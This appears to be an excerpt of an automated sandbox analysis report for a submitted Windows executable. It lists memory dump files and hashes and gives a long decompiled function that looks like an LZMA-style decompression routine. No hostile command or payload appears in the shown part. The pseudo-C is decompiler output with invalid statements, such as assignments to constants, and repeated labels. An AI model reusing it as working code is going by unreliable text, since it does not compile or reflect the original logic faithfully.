0x00406f80
0x00406f82
0x00406f85
0x00000000
0x00406f87
0x00406d04
0x00406d04
0x00000000
0x00406d04
0x00406f85
0x004071ba
0x00000000
0x00000000
0x004067e9
0x004071f1
0x004071f1
0x00000000
0x004071f1
0x0040703e
0x00406fc5
0x00406fc2
0x00000000
0x00406d17

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
